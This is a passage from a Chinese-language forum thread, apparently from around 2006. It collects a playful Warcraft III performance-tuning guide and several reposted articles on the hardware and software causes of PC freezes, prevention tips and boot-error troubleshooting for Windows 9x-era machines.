    组织质量:也有叫贴图质量,但贴图的叫法不太近然哦.这个选项可能是最能消耗电脑性能速度的,
    组织质量是指将一片物体的组织进行复杂化还是简单化,就像菜单背景的草地,你可看得出来有复杂的
    草地和简单的草地,在游戏里的作用分别是:
    低........使用较少的组织数量和16位色彩深度处理人物,光,影和地图
    中........使用标准的组织数量和16位色彩深度
    高........使用标准的组织数量和32位色彩深度(最好是64M显存以上才可以选)

    好了,知已知彼,百战百胜呀!!!哈哈哈,大家都知道吧,16位色和32位色其实肉眼根本无法分清哦,
    相信大家的WINDOWS桌面都是16位色吧,而中和高都是标准组织构物,只有色彩之分,所以
    即加速又根本不影响视觉美感的优化方案是
    [中]!!!
    大家是不是很吃惊!不怪,不怪,本人也曾笨过.唉,想当年啊....

    粒子:
    就是被弑死时,物体碎了的图像效果,还有攻击时的武器光影的浅射图像效果,受到攻击时
    身体受击的图像效果.
    具体为:
    低.......30%实际粒子 中等画质
    中.......65%实际粒子 高等画质
    高.....100%实际粒子 高等画质

    如果在大战役中图像迟顿!就是它造成的!
    选高自然好,你要是好电脑的话,
    这里我推荐
    [中]
    有了高质量画质,和大部分的特效,同时还有大战役的顺畅操作多好呀!
光线:
    光!不用我解释了吧....什么,还要搞二句,我倒!
    好吧,好吧,光.....就是...就是那个...那个..靠,问你爸去...
    低.......使用一道光线
    中.......使用四道光线
    高.......使用八道光线(哦哦哦,月夜精灵族造东西时会很亮呀.小心不能隐型哦.)

    优化方案:
    [高]
    八道光线而已,咱们显卡都没问题滴....注意,我是指16M显存以上的.

    亡灵族的灵塔射击就是光线
    英雄魔法,升级,瞬移
    武器的剑气等等.这些效果就是魔兽好玩的东西,不设高白不设.

    声音:
    声音很重要哦!
    优化方案是:
    单机时:
    全开!
    网络对战时:
    关音乐,
    关环境,
    其它都开.
    环境音效是指
    Ambient Sounds -
    Ambient Sounds allows you to toggle on/off map-specific sound
    effects that are part of the environment. Not all maps have such
    sounds. You will find most of them in single-player campaigns.
    看懂了吗?
    是说:环境音效不是所有地图上的标准声音,但你会以单人游戏战役中听到.
=================================================
此我想告诉大家如何优化你的魔兽争霸III的运行性能。

    基本:
    安装好你的显卡最新驱动
    ATI的用户请装催化版驱动,速度一流可与NVIDIA的雷管驱动相拼哦.
    NVIDIA的用户请装雷管四代的驱动程序,这一版的驱动程序速度狂快.
    其它显卡的用户,多找找新驱动和官方消息.
    推荐驱动网站:WWW.MYDRIVERS.COM

    安装好你的主板驱动
    主板驱动安装好十分重要,但容易忽视哦,
    暴雪公司官方站上说:
    如果出现XXXX0000XX地址错误,要升级主板驱动程序的.

    安装好DX8.1
    你不会没有装这个吧!
    注意检查在DX文件一栏中,是否有打感叹号的文件,如有的话,你就掉了!!哈哈,快换吧.

    优化:
    选用OPENGL模式
    魔兽争霸III默认启动DX8.1的D3D模式,但还有一种模式就是OPENGL的3D模式,
    并不是暴雪公司不愿意设它为主要模式,而是OPENGL是属于专业三维,有一部分显卡
    还不支持或不完全支持这个功能,但是,我要说的是这种三维模式其实显示的图像更
    好,更亮丽,更平滑光细.....并且速度快.
    无论是ATI 还是NVIDIA的用户都最好选OPENGL模式,
    这两个公司的近二年产品对OPENGL的支持都是狂好!哈哈哈
    使用的方法是:
    在桌面快捷的属性中写入"-opengl".
    例如: "E:Warcraft IIIIwar3.exe" -bnetd -opengl
    你问我前面的-bnetd是什么吗? 哦!(我想想看啊,,,哦.......我想起来了!)
    前面的-bnetd是上战网的参数哦!不写这一个上国内战网是不行滴...嘿嘿

    设置OPENGL驱动

    在你的显卡驱动程序中要记得启用OPENGL的"MIP线性过滤功能",MIP就是快速线性图像处理.
    速度又快了10%了吧! 我再哈哈哈!

    测试显卡是否支持OPENGL请用 [魔兽显卡测试工具] 测试一下就知道了,
    什么?这个测试工具哪里有?问我吗?真的是问我吗?果然是问我吗?哦,的确是问我吗?
    嘿嘿嘿,到这个网站上下载吧,中文的哦!
    http://xihaier.diy.163.com
    主页上就看到啦!
    这个测试还可以测试DX8.1的D3D模式,以及各种分辨率,还有FPS的侦数显示.....
    快去下吧!!!!要抢哦...

    黑屏的用户处理方案
    在快捷启动中加入
    -swtnl
    例如:E:Warcraft IIIIwar3.exe" -swtnl
    OK了吧!哈哈,庆祝一翻哦!要记得我的好哦!不要太兴奋了哦!
    知道为什么可以用了吗?嘿嘿,保密,俺留一手.


全面深入了解电脑死机的原因

《一键清理系统垃圾》

全面深入了解电脑死机的原因

全面深入了解电脑死机的原因

死机是令操作者颇为烦恼的事情。死机时的表现多为“蓝屏”，无法启动系统，画面“定格”无反应，鼠标、键盘无法输入，软件运行非正常中断等。尽管造成死机的原因是多方面的，但是万变不离其宗，其原因永远也脱离不了硬件与软件两方面。

    由硬件原因引起的死机

    【散热不良】 显示器、电源和CPU在工作中发热量非常大，因此保持良好的通风状况非常重要，如果显示器过热将会导致色彩、图象失真甚至缩短显示器寿命。工作时间太长也会导致电源或显示器散热不畅而造成电脑死机。CPU的散热是关系到电脑运行的稳定性的重要问题，也是散热故障发生的“重灾区”。

    【移动不当】 在电脑移动过程中受到很大振动常常会使机器内部器件松动，从而导致接触不良，引起电脑死机，所以移动电脑时应当避免剧烈振动。

    【灰尘杀手】 机器内灰尘过多也会引起死机故障。如软驱磁头或光驱激光头沾染过多灰尘后，会导致读写错误，严重的会引起电脑死机。

    【设备不匹配】 如主板主频和CPU主频不匹配，老主板超频时将外频定得太高，可能就不能保证运行的稳定性，因而导致频繁死机。

    【软硬件不兼容】 三维软件和一些特殊软件，可能在有的微机上就不能正常启动甚至安装，其中可能就有软硬件兼容方面的问题。

    【内存条故障】 主要是内存条松动、虚焊或内存芯片本身质量所致。应根据具体情况排除内存条接触故障，如果是内存条质量存在问题，则需更换内存才能解决问题。
  【硬盘故障】 主要是硬盘老化或由于使用不当造成坏道、坏扇区。这样机器在运行时就很容易发生死机。可以用专用工具软件来进行排障处理，如损坏严重则只能更换硬盘了。另外对于在不支持UDMA 66/100的主板，应注意CMOS中硬盘运行方式的设定。

    【CPU超频】 超频提高了CPU的工作频率，同时，也可能使其性能变得不稳定。究其原因，CPU在内存中存取数据的速度本来就快于内存与硬盘交换数据的速度，超频使这种矛盾更加突出，加剧了在内存或虚拟内存中找不到所需数据的情况，这样就会出现“异常错误”。解决办法当然也比较简单，就是让CPU回到正常的频率上。

    【硬件资源冲突】 是由于声卡或显示卡的设置冲突，引起异常错误。此外，其它设备的中断、DMA或端口出现冲突的话，可能导致少数驱动程序产生异常，以致死机。解决的办法是以“安全模式”启动，在“控制面板”→“系统”→“设备管理”中进行适当调整。对于在驱动程序中产生异常错误的情况，可以修改注册表。选择“运行”，键入“REGEDIT”，进入注册表编辑器，通过选单下的“查找”功能，找到并删除与驱动程序前缀字符串相关的所有“主键”和“键值”，重新启动。

    【内存容量不够】 内存容量越大越好，应不小于硬盘容量的0.5～1%，如出现这方面的问题，就应该换上容量尽可能大的内存条。

    【劣质零部件】 少数不法商人在给顾客组装兼容机时，使用质量低劣的板卡、内存，有的甚至出售冒牌主板和Remark过的CPU、内存，这样的机器在运行时很不稳定，发生死机在所难免。因此，用户购机时应该警惕，并可以用一些较新的工具软件测试电脑，长时间连续考机（如72小时），以及争取尽量长的保修时间等。
  由软件原因引起的死机

    【病毒感染】 病毒可以使计算机工作效率急剧下降，造成频繁死机。这时，我们需用杀毒软件如KV300、金山毒霸、瑞星等来进行全面查毒、杀毒，并做到定时升级杀毒软件。

    【CMOS设置不当】 该故障现象很普遍，如硬盘参数设置、模式设置、内存参数设置不当从而导致计算机无法启动。如将无ECC功能的内存设置为具有ECC功能，这样就会因内存错误而造成死机。

    【系统文件的误删除】 由于Windows 9x启动需要有Command.com、Io.sys、Msdos.sys等文件，如果这些文件遭破坏或被误删除，即使在CMOS中各种硬件设置正确无误也无济于事。解决方法：使用同版本操作系统的启动盘启动计算机，然后键入“SYS C：”，重新传送系统文件即可。

    【初始化文件遭破坏】 由于Windows 9x启动需要读取System.ini、Win.ini和注册表文件，如果存在Config.sys、Autoexec.bat文件，这两个文件也会被读取。只要这些文件中存在错误信息都可能出现死机，特别是System.ini、Win.ini、User.dat、System.dat这四个文件尤为重要。

    【动态链接库文件（DLL）丢失】 在Windows操作系统中还有一类文件也相当重要，这就是扩展名为DLL的动态链接库文件，这些文件从性质上来讲是属于共享类文件，也就是说，一个DLL文件可能会有多个软件在运行时需要调用它。如果我们在删除一个应用软件的时候，该软件的反安装程序会记录它曾经安装过的文件并准备将其逐一删去，这时候就容易出现被删掉的动态链接库文件同时还会被其它软件用到的情形，如果丢失的链接库文件是比较重要的核心链接文件的话，那么系统就会死机，甚至崩溃。我们可用工具软件如“超级兔仔”对无用的DLL文件进行删除，这样会避免误删除。
    【硬盘剩余空间太少或碎片太多】 如果硬盘的剩余空间太少，由于一些应用程序运行需要大量的内存、这样就需要虚拟内存，而虚拟内存则是由硬盘提供的，因此硬盘要有足够的剩余空间以满足虚拟内存的需求。同时用户还要养成定期整理硬盘、清除硬盘中垃圾文件的良好习惯。

    【BIOS升级失败】 应备份BIOS以防不测，但如果你的系统需要对BIOS进行升级的话，那么在升级之前最好确定你所使用BIOS版本是否与你的PC相符合。如果BIOS升级不正确或者在升级的过程中出现意外断电，那么你的系统可能无法启动。所以在升级BIOS前千万要搞清楚BIOS的型号。如果你所使用的BIOS升级工具可以对当前BIOS进行备份，那么请把以前的BIOS在磁盘中拷贝一份。同时看系统是否支持BIOS恢复并且还要懂得如何恢复。

    【软件升级不当】 大多数人可能认为软件升级是不会有问题的，事实上，在升级过程中都会对其中共享的一些组件也进行升级，但是其它程序可能不支持升级后的组件从而导致各种问题。

    【滥用测试版软件】 最好少用软件的测试版，因为测试软件通常带有一些BUG或者在某方面不够稳定，使用后会出现数据丢失的程序错误、死机或者是系统无法启动。

    【非法卸载软件】 不要把软件安装所在的目录直接删掉，如果直接删掉的话，注册表以及Windows目录中会有很多垃圾存在，久而久之，系统也会变不稳定而引起死机。

    【使用盗版软件】 因为这些软件可能隐藏着病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

    【应用软件的缺陷】 这种情况是常见的，如在Win 98中运行那些在DOS或Windows 3．1中运行良好的16位应用软件。Win 98是32位的，尽管它号称兼容，但是有许多地方是无法与16位应用程序协调的。还有一些情况，如在Win 95下正常使用的外设驱动程序，当操作系统升级后，可能会出现问题，使系统死机或不能正常启动。遇到这种情况应该找到外设的新版驱动。

  【启动的程序太多】 这使系统资源消耗殆尽，使个别程序需要的数据在内存或虚拟内存中找不到，也会出现异常错误。

    【非法操作】 用非法格式或参数非法打开或释放有关程序，也会导致电脑死机。请注意要牢记正确格式和相关参数，不随意打开和释放不熟悉的程序。

    【非正常关闭计算机】 不要直接使用机箱中的电源按钮，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows 98/2000/NT等系统来说，这点非常重要，严重的话，会引起系统崩溃。

    【内存中冲突】 有时候运行各种软件都正常，但是却忽然间莫名其妙地死机，重新启动后运行这些应用程序又十分正常，这是一种假死机现象。出现的原因多是Win 98的内存资源冲突。大家知道，应用软件是在内存中运行的，而关闭应用软件后即可释放内存空间。但是有些应用软件由于设计的原因，即使在关闭后也无法彻底释放内存的，当下一软件需要使用这一块内存地址时，就会出现冲突。(傅莉)

2006-6-24 10:30:03　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.2

--------------------------------------------------------------------------------

防止电脑死机二十五招

1、在同一个硬盘上安装太多的操作系统会引起系统死机。

2、CPU、显示卡等配件不要超频过高，要注意温度，否则，在启动或运行时会莫名其妙地重启或死机。

3、在更换电脑配件时，一定要插好，因为配件接触不良会引起系统死机。

4、BIOS设置要恰当，虽然建议将BIOS设置为最优，但所谓最优并不是最好的，有时最优的设置反倒会引起启动或者运行死机。

5、最好配备稳压电源，以免电压不稳引起死机。

6、如果有条件的话，加装一个UPS，使电脑在停电后不会造成死机。

7、对来历不明的软盘和光盘，不要轻易使用，对E－mail中所附的软件，要用KV300、瑞星等杀毒软件检查后再使用，以免传染病毒后，是系统死机。

8、在应用软件未正常结束时，别关闭电源，否则会造成系统文件损坏或丢失，引起自动启动或者运行中死机。对于Windows98/2000/NT等系统来说，这点非常重要。

9、在安装应用软件当中，若出现提示对话框“是否覆盖文件”，最好选择不要覆盖。因为通常当前系统文件是最好的，不能根据时间的先后来决定覆盖文件(除非你对文件的时间很在意)。

10、在卸载软件时，不要删除共享文件，因为某些共享文件可能被系统或者其他程序使用，一旦删除这些文件，会使应用软件无法启动而死机，或者出现系统运行死机。

11、设置硬件设备时，最好检查有无保留中断号(IRQ)，不要让其他设备使用该中断号，否则引起IRQ冲突，从而引起系统死机。

12、在加载某些软件时，要注意先后次序，由于有些软件编程不规范，在运行是不能排在第一，而要放在最后运行，这样才不会引起系统管理的混乱。

13、在运行大型应用软件时(如OFFICE 2000)，不要在运行状态下退出以前运行的程序，否则会引起整个Windows98系统的崩溃。

14、在内存较小的情况下(如4MB－16MB)，最好不要运行占用内存较大的应用程序，否则在运行时容易出现死机。建议在运行这些程序时应及时保存当前正在使用的文件。

15、对于系统文件或重要文件，最好使用隐含属性，这样才不致于因误操作而删除或者覆盖这些文件。

16、修改硬盘主引导记录时，最好先保存原来的记录，防止因修改失败而无法恢复原来的硬盘主引导记录。

17、最好少用软件的测试版，因为测试版在某方面不够稳定，在使用后会使系统无法启动。

18、在Windows95/98中尽量不要运行16位应用程序，因为16位的应用程序会与Windows中的32位应用程序产生冲突，从而引起死机或无法启动。

19、在升级BIOS之前，应确定所升级的BIOS版本，同时应先保存一下原先的版本，以免升级错误而使系统无法启动。

20、尽量不要使用盗版的软件，因为这些软件里隐藏着大量病毒，一旦执行，会自动修改你的系统，使系统在运行中出现死机。

21、在机箱中，可能蕴藏了大量的灰尘，灰尘若接触了配件的电路，会使系统不稳定或死机。

22、在执行磁盘碎片整理的时后，不要运行大型应用软件，否则引起死机。

23、用杀毒软件检查硬盘期间，不要运行其它的应用程序，以防止系统死机。

24、在上网的时候，不要一次打开太多的浏览窗口，导致资源不足，引起死机。

25、在关闭计算机的时候，不要直接使用机箱中的电源按钮，因为直接使用电源按钮会引起文件的丢失，使下次不能正常启动，从而造成系统死机。

  对经常死机朋友，请试试以上方法，相信会对大家有一定的帮助的，有时候要针对具体情况来采取不同的对策，切不可生搬硬套哦

2006-6-24 10:31:09　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.3

--------------------------------------------------------------------------------

谈谈如何有效地减少电脑的死机
电脑的死机现象是一个令所有电脑爱好者都头疼不已的问题。

    对于电脑频繁的蓝屏，频繁的死机，一次又一次的重新启动真是令人感到无比厌烦。况且，对电脑进行频繁的重启所带来的硬件的损耗比正常运行时要大好几倍，这无疑大大增加了硬件损坏的几率。

    但是采用Windows 9X操作系统的电脑，死机却是一件无法避免的事情，究其原因是由于Windows 9X操作系统自身核心不稳定造成的。

    虽然死机是不可避免的，但是笔者在长期与死机的艰苦斗争中，还是总结出一些可以有效地减少电脑死机的方法，不敢独享，特写出来奉献给各位读者，希望大家的电脑都能减少一些死机，多一些稳定。

    产生死机的原因很多，但总的来说不外乎两大类：硬件原因和软件原因。下面我就分开来给大家具体地讲一讲。

硬件篇

    1.现在的CPU和显示卡由于采用了新工艺，所以都具有不错的超频性能，但超频极易引起系统的不稳定甚至死机（损坏硬件暂且不论）。对于由超频引起的死机现象，应当及时予以降频，或恢复其额定工作频率，以保证电脑稳定工作。

    2.在更换电脑配件时，安装完毕后，一定要再仔细检查一遍，看硬件是否已经插好，以防止接触不良引起死机。

    3.有时由于各个硬件之间的冲突而引起死机，这时要试试为板卡刷新新版的BIOS，更新驱动程序或是更改系统中的设备的中断号，实在不行的话，请更换硬件。

    4.主板的BIOS一定要设定得当，虽然现在许多报纸、杂志和网站都教大家如何将BIOS设置为最优，但殊不知最优的设定却不一定是最稳定的。若由于BIOS设置不当引起死机，应立即将BIOS恢复到出厂时的缺省设置。

    5.电脑主机一定要配备高质量高性能的电源，因为现在的电脑配件耗电量都较大，特别是超频使用时，耗电量会倍增，若此时电源功率不足，硬件便会出现供电不足的情况，从而引起死机。

    6.在内存较小的情况下（小于128M），最好不要运行占用内存较多的软件和游戏或是同时运行多个程序，这样会导致物理内存不足，从而引起死机。

    7.在升级主板或是显示卡的BIOS之前，一定要先确定所要升级的BIOS的版本号是否与板卡的型号相符，同时强烈建议备份原来的版本，以防万一。

    8.空气中蕴藏着大量的灰尘，久而久之机箱中便会积攒大量的灰尘，这时应当及时清理，否则严重影响散热效果，且灰尘接触板卡电路时会引起短路，从而引起死机。

    9.“严密监视”各个配件的温度，特别是盛夏来临之时，天气炎热，此时若配件温度过高便会引起死机。

软件篇

    1.对于来历不明的软件、光盘或是盗版软件，一定不要轻易使用，以免传染电脑病毒，引起死机。

    2.一定要对电脑进行正常的关机，绝对不能直接关闭电源，否则容易造成系统文件丢失或是损坏，引起死机。

    3.在删除软件时，不要将软件所在的目录直接删除，这样的话会在硬盘和注册表中残留大量的不好的，久而久之会越集越多，导致系统负担加重，最后系统会不堪重负而死机。正确的方法是，采用软件自带的卸载程序对软件进行删除。

    4.在电脑常时间运行后或是系统资源低下的情况下，如果要运行大型软件，一定要先将电脑重新启动，否则会因为系统资源不足而引起死机。

    5.最好少用软件或是硬件驱动的测试版本，因为测试版本中存在着大量的BUG和不稳定因素，易导致死机。

    6.对于系统文件最好使用隐藏属性，这样才不会因为误删系统文件而导致死机。

    7.上网时，一次不要打开过多的网页，以免系统负担过重，从而导致死机。再有，千万不要打开一些不大清楚的网页，因为其中可能含有一些恶意代码，对系统进行修改，从而导致死机。

    好，防止死机的方法就给大家介绍到这，希望对每位读者都有帮助

2006-6-24 10:32:05　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.4

--------------------------------------------------------------------------------

开机黑屏的一般解决方法

一、检查电力供电，电脑电源，电源接口

1、检查机箱电源的接口和电源线是否完好，如果借口和电源线有破损、断裂的应当及时更换。
2、检查主板电源线插口，如果没有破损就将插口拔出再插入，按下电源开关时，轻轻搬动电源线看是否有反应来判断是否是因为电源线接触不良或焊点松脱导致电源没有接通。
3、采用替换法，将这台电源换到其他的机器上试试，同样也可以用一个好的电源接到机器上看是否能启动以判断电源的好坏。特别注意检查电源上的开关是否接通，有些电源是带有开关的。

二、采用最小系统法
1、将主板取下来，先用毛刷（质量要好，绝不能脱毛，笔者曾经遇到因为毛刷脱掉的毛掉入显卡插槽引起显卡不工作而黑屏的人为故障）进行清洁，不过最好用吹风的冷风档吹一吹，用皮老虎也行，这样清洁后，很多因为灰尘而引起的故障自然而然就得到解决！
2、将CPU，内存条，显卡插上，看机器是否点亮。同时可以采用替换法，将好的CPU、内存条和显卡插上测试，以判断故障所在。这时对于一些有关CPU的跳线（硬跳线）要特别注意是否设置正确。特别是在升级CPU的情况下，要先看看主板是否支持新CPU。以免将电压设置过高将CPU烧坏。
3、如果在最小系统下，机器仍然不亮，而又确定了CPU（跳线设置也正确）、显卡、内存条都完好的情况下，就应该怀疑主板的问题了

2006-6-24 10:33:06　编辑 删除　IP：已记录

Re:电脑<<死机>>全集
seiyas
版主

角色：论坛版主
等级：侠之大者
公会：赛雅万维办公室
发帖：278
经验：487
金币：487
注册：2006年6月4日

信息 日志 短讯 邮箱 好友 搜索 引用 回复 No.5

--------------------------------------------------------------------------------

电脑死机的14种情况判断码
每一个使用电脑的人都或多或少遇到过死机的问题，下列是常见的死机情况，以供大家参考：
◆情况1：板、卡接触不良、松动，或者板上的插槽坏了，或者干脆显示卡、内存等配件是坏的，导致显示器不亮。
◆情况2：电压起伏太大，造成板、卡上电流或大或小，有时会损坏硬件。所以选择一款能够起到超电压保护的电源是至关重要，或者加稳压器。
◆情况3：打印机、刻录机、扫描仪等外设已坏，但即插即用的技术使系统在启动时检测这些设备导致死机。
◆情况4：超频超过火了，有时显示器不亮，有时是进入系统后死机，严重者会导致CPU被烧坏。
◆情况5：如果主机运行正常，也有硬盘运行的声音，但显示器不亮，可能是显示器坏了，或者是显示器信号线接触不 好或是坏的，也有可能是显示器电源未插。
◆情况6：开机只听见“嘀、嘀”的单声长声，估计是内存的问题，换个插槽试试，仍不行的话，可能是内存坏了。
◆情况7：indows95、98系统需要把硬盘一部分作为虚拟内存，硬盘剩余空间太小，也会导致死机。
◆情况8：病毒导致死机。
◆情况9：软件的Bug导致死机。
◆情况10：运行软件互相冲突，如16位与32位软件同时运行可能造成死机。
◆情况11：网上时，黑客侵入。
◆情况12：系统System等子目录中链文件.Dll丢失，造成Windows系统瘫痪。
◆情况13：错误修改了系统注册表信息，造成Windows系统不能启动。
◆情况14：机器运行速度太慢，造成死机的假象

电脑崩溃和死机原因分析

当你的电脑无缘无故死机了，到底发生了什么?为什么有的操作系统看起来比其他操作系统稳定呢？看完本文也许您会了解一些。

所有的电脑都会崩溃，任何的操作系统都难以幸免。（在写这篇文章，回答这个问题时，它就曾经崩溃过一次=)）。但是指出引起崩溃的原因并不是一件简单的事：麻省理工学院的计算机科学系教授Daniel Jackson指出。Jackson教授认为其潜在的根本原因是硬件和软件开放商都试图在“互联网时间”内迅速推出他们的产品，这样做的结果是产品的质量和可靠性受到影响。

通常一个操作系统，是由百万行的代码和数百个程序构成。同时由数百个人在一起合作，这不是一件容易的事。并且最终的结果很难达到完美无缺的。为了找出那些小故障，开发者在软件接近完成时雇佣测试者。当问题找到后，补丁程序写入，纠正这些错误。它们的确防止了崩溃。然而原始的错误代码并没有被删除。同时Jackson教授还指出：测试并不能找出设计层面的缺陷。

引起崩溃的来源主要有三种：1，应用程序。2，设备驱动程序。3，操作系统。绝大多数的崩溃源于前二者。当一个应用程序试图访问另一个应用程序的内存时，往往会发生错误。如：当Word开始使用为Excel保留的内存空间时，就好象一个国际象棋选手移动了另一个选手的棋子。这时另一位选手或裁判就会宣布：“游戏结束”。

理论上，一个文字处理软件并不会引起整个电脑的崩溃，但是事实上，情况往往是如此。那是因为操作系统就好像刚才说的那个裁判，当他发现一个程序正在修改另一个程序时,它就会吹响口哨,因为这可能导致系统的不稳定。不同的操作系统对同样的问题有不同的反应，如早期的WINDOWS版本就会发生“蓝屏死机”，越来越多更加稳定的操作系统在每个应用程序上构筑了“虚拟墙”。所以即使一个程序不能按计划执行，也不会打断其他程序，从而引起整个系统的崩溃。

设备驱动是一种沟通操作系统和硬件的程序。BUG通常在产品发布后才被发现。通常是制造商在产品发布之后提供驱动更新。新的应用程序（尤其是图像编辑软件）一般要求新的驱动，以此来消除原有驱动造成的问题。微软声称，通过WINDOWS XP中的自动更新驱动程序，XP将比老的WINDOWS版本可靠性提高十倍。老的电脑的驱动程序可以在硬件制造商的网站上找到。

你的操作系统很少会直接导致崩溃，但是有许多情形会引起崩溃，如错误的应用程序内存地址。不能校验内存容量，都会使系统变的不稳定。操作系统的BUG也会因为软硬件的增加而显现出来

电脑死机原因解析

一、开机不亮或无法通过自检
    首先，如果电脑机箱面板的指示灯没有亮，也没有听到风扇的转动声，电脑一点反应都没有，则表明电脑还没有通电，应该检查供电情况。
    如果看到机箱面板的指示灯已经亮了，也听到了风扇的转动声，这表明电脑已经通电。此时要是显示器的指示灯没有亮，则检查一下显示器的电源线是否已经接好，并（重新）打开显示器的电源开关；如果显示器的指示灯已经点亮，那么就要看显示器的屏幕上是否已经有文字显示了。
    1.屏幕上没有任何显示。先检查一下是否已经把显示器的信号线牢固地连接在显卡接口上。如果听到喇叭发出“嘀——嘀嘀”一长两短的报警音。这说明显卡没插好，或是接触不良。这时应关闭电源，重新插好显卡，并将其固定好。要是还不亮，并继续发出一长两短的报警音，就说明显卡本身可能有问题了，建议先将显卡换到别的机器上去试一下，不行的话，就只能更换一块显卡了。
    如果喇叭发出的声音是“嘀——嘀”的长报警音，则说明是内存条出现了问题，最好重新插一下内存条，并在不同的内存插槽上试试。如果不行的话，就只能更换内存条了。
    要是没有听到任何的报警音（确认PC喇叭已经连接无误）。那就麻烦了，就需要使用“排除法”来逐一检查各个配件，并最终确认“罪魁祸首”。
    2.出现自检信息，并且内存自检完毕后就死机了。这有可能是在CMOS中内存的参数设置不对造成的。例如对没有校验的内存设置了校验，或是在CMOS中将内存的“DRAM Read Burst Timing”和“DRAM Write Burst Timing”等参数值设置得过小，致使内存条的实际性能达不到设置的要求，导致电脑出现死机的情况。此外，在为电脑添加新内存条的时候，应尽量选用相同品牌、型号的内存条，以免出现不兼容的问题。
    如果显示的是“HARD DISK FAILURE”，那么就需要检查硬盘的电源线和数据线是否连接完好、无误，不行的话就把硬盘拿到别的机器上去检测一下，如果仍然不能被识别，则说明硬盘本身出现物理损坏，需要维修或者更换硬盘。
    开机无法进入系统
    接通电源并打开主机开关后，电源指示灯亮，硬盘指示灯同时闪烁，则说明主机已经正常启动，问题应该是出在了显示系统方面。首先应该检
查一下显示器同显卡相连的信号线是否有松动现象，要是听到了报警音或自检后无法进入操作系统的话，则参考第一部分的相关解决方法排除问题。
    启动Windows过程中死机
    1.屏幕显示：“Invalid partition table”或“Not Found any [active partition] in HDD”,以及“DISK BOOT FAILURE,INSERT SYSTEN DISK AND PRESS ENT”的提示。这说明该硬盘还没有被分区、分区表被破坏或是分区没有被激活。这时候应该先查杀病毒再做分区，激活分区以及硬盘格式化的工作。
    2.屏幕出现：“Miss operation system”的提示。则表明硬盘没有被格式化，或是没有安装操作系统。
    3.出现“DISK BOOT FAILURE, INSERT SYSTEM DISK AND PRESS ENTER”这个提示，则说明系统启动失败，我们首先要做的是重新启动电脑，进入到CMOS设置中查看硬盘是否存在。如果没有检测到硬盘，就有很大的可能是硬盘或硬盘的连接出现问题了，需要进行进一步的排除、检测。
    4.屏幕显示：“Invalid system disk ，Replace the disk, and then press any key”，这说明硬盘上的系统文件丢失，比如IO.SYS，MSDOS.SYS文件。恢复的方法就是用Windows启动盘启动电脑，然后用SYS命令重新给硬盘传递一个系统就可以解决了。此外，还有可能是由于软驱中由非引导盘的软盘引起的。
    5.当Windows 的启动画面出现后，便没有了反应。造成这种情况的原因就比较复杂了，比较难以判断。问题既可能来自于软件因素，也可能来自于硬件。
    软件方面，首先要检查引导区文件是否感染了病毒，最好是分别使用不同的杀毒软件来检查。切记，在查杀之前，先要更新杀毒软件的病毒库文件。此外，还有可能是由于驱动程序损坏，不兼容或是注册表混乱引起的。遇到这种情况的话，就要进入“安全模式”重新安装驱动或是恢复注册表文件，问题严重的时候（无法进入“安全模式”），就只能重新安装操作系统了。
    硬件方面则有可能是由于机器的散热情况较差，导致CPU或是显卡芯片的工作温度过高而导致死机。当然了，因为显卡芯片工作温度过高导致的开机死机现象并不多见，我们在这 里主要关注的还是CPU方面的问题。尤其是现今的CPU运行速度越来越快，主频越来越高，发热量也是随之越来越大，因此建议大家最好不要超频使用，并且一定要给CPU配上一个散热效果好的风扇。
6.屏幕上出现类似于下面这样的提示：报告说有文件找不到，然后死机或者重新启动的情况。出现这种情况主要是由于操作系统中的一些引导文件或驱动程序（扩展名为“VXD”或“DLL”的文件）被误删除，或者文件丢失、损坏。遇到这种情况的时候，我们可以找一个相同的系统，将完好的文件COPY过来，不行的话就只好重新安装操作系统了。
    Windows使用中死机
    在Windows操作系统使用中突然出现死机，导致这种情况的原因比较多，下面列出了几种常见现象及其解决方法：
    1.当应用程序运行中或运行完毕后死机，并且移动鼠标时机箱喇叭会发出“嘟……嘟……”的声音，且点击无反应，说明该程序没有正常的被关闭，一直占用着系统资源。在这种情况下一般可采用强行关闭该程序的方法。同时按下“Ctrl”，“Alt”和“Del”键后，就会弹出一个对话框界面，一般直接选择死机前所运行的那个程序，然后单击“结束任务”按钮即可退回到正常操作状态。
    2.如果是只有在运行某些特定应用程序时才出现死机现象的话，则很有可能是这个应用程序感染了病毒，这时候我们就需要使用杀毒软件对硬盘内的所有文件来一次“安检”了。
    3.要是电脑总是突然重新启动的话，问题应该出现在电源方面，是由于电源输出电压或当地市电不稳定造成的，这时最好找专业人员测试一下，如果是电源本身的问题，赶紧更换，以免造成更大的损失。
    除了以上三点之外，对于经常上网的朋友来说，还要格外注意是不是一些“黑客”软件在系统背后作祟。
    退出操作系统时死机
    Windows如果不能彻底关机，就会把磁盘缓冲区里的数据写到硬盘上，这就会进入一个死循环。除非用户重新启动系统，否则不能执行其他任何程序或指令。
    产生这种情况的原因主要为Windows的系统设置或某些驱动程序的设置不当造成的，解决方法通常都是从“控制面板”中进入“系统”，再打开“设备管理器”，查看一下是否存在有问题的硬件设备(在名称前有一个黄色的“!”
图标)，我们可以删除（禁用）掉该设备，也可以为该设备重新安装一次驱动程序。此外，还要再检查一下是否是系统在后台运行了一些驻留内存的DOS程序。一般来说，这类问题都能通过这些方法予以解决。
    看过上面的这些死机情况及其解决方法，相信大家今后在遇到这些情况的时候就不会再手忙脚乱了吧。当然了，我们这里介绍的还不是很全面，具体情况还需要大家具体分析。
    丢失文件的系统提示：
    Cannot find a device file that may be needed to run Windouws or a Windows application.
    The Windows registry or SYSTEM.INI file refers to this device file,but the device file no longer exists.
    If you delted this file or purpose,try uninstalling the associated application uesing its uninstall or setup program.
    If you still want to use the application associated with this device file,try reinstalling that application to replace the missing file.
    C:\WINDOWS\SYSTEM\VMM32　　IOS.VXD
    Press a key to continue

